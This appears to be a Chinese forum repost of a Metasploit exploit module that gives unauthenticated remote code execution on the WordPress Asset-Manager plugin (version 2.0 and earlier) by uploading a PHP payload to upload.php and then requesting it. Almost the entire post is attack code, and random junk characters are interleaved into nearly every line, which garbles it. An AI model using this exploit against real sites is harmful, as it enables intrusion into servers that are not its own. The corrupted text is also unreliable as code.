这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ }4 \' y. K; t3 ~ m# e* T3 `& A
' y% H, E1 ]+ r+ ?5 t' C0 F/ D##
* I- W: w; v8 [* [# This file is part of the Metasploit Framework and may be subject to
& E6 }; m; t) a% J# redistribution and commercial restrictions. Please see the Metasploit
8 V& {& F. W3 i& D5 q z# Framework web site for more information on licensing and terms of use.
) v8 k" d- ^3 E/ l* I9 k# http://metasploit.com/framework/! s* ^) a* d- Y# W# u C
##+ B& k2 x" z# U, D& }
, L/ D3 W' t! K7 X1 u. N/ E
require 'msf/core'
0 D u7 Y3 [6 M" k' `2 L: ?require 'msf/core/exploit/php_exe'3 @- q5 k; T+ X. N4 B0 |
' f8 ^6 D% Y# F$ J# r2 y- a1 s
class Metasploit3 < Msf::Exploit::Remote) H9 M2 b* ~& ?& a6 |' a
Rank = ExcellentRanking+ q" @$ ~, o1 V/ I3 h9 H
8 q' ?3 A" S2 ^+ S/ X' U6 q
include Msf::Exploit::Remote::HttpClient9 q4 [8 h! N% ?) S8 K) q
include Msf::Exploit: hpEXE
0 M/ E1 |' V0 V1 w1 Z) {4 M! p
9 U& D3 N+ v4 ~; J% Q& K9 i0 A# r2 h def initialize(info = {})
9 Q! O( ]6 m2 y# k3 \0 e6 e7 e super(update_info(info,
' l5 E4 P/ b: c* {5 z$ H# b7 v 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 l8 q, N7 _6 J5 Q 'Description' => %q{
! j2 z1 f7 N9 g, k- U, [ This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress# o) r2 A! a0 i
plugin. By abusing the upload.php file, a malicious user can upload a file to a
$ g- U' K' H" ? h5 I, Z2 b. Y temp directory without authentication, which results in arbitrary code execution.8 i9 G' ~5 f& }# r: w( |6 n% C6 {
},9 e3 O* X1 L8 R% P; l; \0 c* M
'Author' =>
k/ P% ]( h p. D7 y( ` [# N/ }& q# l0 v3 i
'Sammy FORGIT', # initial discovery
) F) H, R: }5 c& J 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
3 n' f9 b! ^2 K7 T ],( q$ e% \% O* `) _, |
'License' => MSF_LICENSE,
- t% B! a" j% K+ ^ 'References' =>
( @) I9 K5 \4 | [
; B: d) N6 U/ G( p [ 'OSVDB', '82653' ],; U: S$ [! o R, x5 }0 K: `
[ 'BID', '53809' ],
1 k9 L ^, d4 t: x/ c [ 'EDB', '18993' ],# R. Y! Z/ {2 D
[ 'URL', 'http:// www.myhack58.com /' ]+ Q" K6 x: x, M( B/ }' Q
],
1 M/ d: ~+ E% Z8 l1 ]3 E( Q 'Payload' =>
+ A' Y) m; x/ z+ c {) ^6 j- X- G0 {5 w4 y7 J
'BadChars' => "\x00",0 p# U% w$ Y |+ q! n& b
},& S) X0 C3 V1 A' P5 c# [1 ~- e M* h
'Platform' => 'php',( r) ^! x" t" r- F
'Arch' => ARCH_PHP,4 c- g' o0 k. }$ Q. g* U' F' s
'Targets' =>' ]! H# ]6 ^# H5 z$ t
[
" `5 w3 H' s+ v/ _* ^* H! S6 n% f [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
" |; Q; v2 V; u- M% [( Q [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
. z. j% y7 {! [- { ],) Z! \% ~6 \4 N5 r) Q6 U, P
'DefaultTarget' => 0,5 a9 T+ W( y! a% V
'DisclosureDate' => 'May 26 2012'))
0 d/ a1 v! H8 g6 M2 k8 ^
- W. q/ {9 f/ q& |6 O register_options(
5 W5 ?( ]& M/ @ {- p m [
/ y; s3 K5 l" v8 [8 r! Q OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
& F: L# N. _: m ], self.class)
. a( C; p1 X( } end; _& B/ W" B* Y+ A" {
; e2 U: C2 n/ }+ |: F
def exploit/ L Y( }/ m3 u
uri = target_uri.path
' |9 R2 ]3 E$ m, U" D uri << '/' if uri[-1,1] != '/'
! g2 z v; I9 @/ ` peer = "#{rhost}:#{rport}"
2 ^* p( p# ~9 h payload_name = "#{rand_text_alpha(5)}.php" E$ t2 B$ u( l0 t1 H6 @' U+ b
php_payload = get_write_exec_payload(:unlink_self=>true)5 ^3 j- D5 P4 J6 b) ?7 U
7 l! N' ?" V# ] W6 f data = Rex::MIME::Message.new* M6 W5 d' f/ Z. T
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")8 E( g, z$ g; Z0 l; Z
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')( V# Y4 C! j' h& A9 W' W
4 Z4 B( A" p. K4 W4 ?3 p
print_status("#{peer} - Uploading payload #{payload_name}")( y6 _! T) y0 `. m- H& {
res = send_request_cgi({* E) {$ E' W" L. Q% l) @# c+ n- Z
'method' => 'POST',, T$ [2 Q8 a! h" I8 ]! ^4 I. l
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
0 @7 v8 e% g4 Z! a# r6 N K 'ctype' => "multipart/form-data; boundary=#{data.bound}",
|$ H, e% M# R$ D9 v @2 {2 { 'data' => post_data- n" E7 I+ C( H. Z7 a8 t
})
8 G7 o" x* d% O. }/ I) C/ ~+ j
, ?; i$ h; \1 y7 z; i* q( E if not res or res.code != 200 or res.body !~ /#{payload_name}/
6 i$ e. A/ m. q4 g fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")' F" w6 \0 a' R g7 c8 F
end9 o8 X1 a7 P: [; j
' d0 f3 s! [# x2 u: q x
print_status("#{peer} - Executing payload #{payload_name}")+ q: z; L7 [% t
res = send_request_raw({9 t8 t$ P! o' S7 F$ H, O& f7 S
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
1 u5 e3 n" D* l 'method' => 'GET'
# N* ^; y3 Z4 p3 S# B: K D7 M })2 E2 X( R f! E0 s7 M$ F
4 k* V& Z! ]; D! J! C if res and res.code != 200
- _% W+ B, _! G* w fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
" d; ?. i# x2 H* g- B4 V# x8 ` end& h7 Q$ c% J" v9 r
end
* D3 `% t/ w* N! J+ a% Gend8 }5 \, }' D4 y
|
发表于 2012-12-31 09:22:33
收藏
支持
反对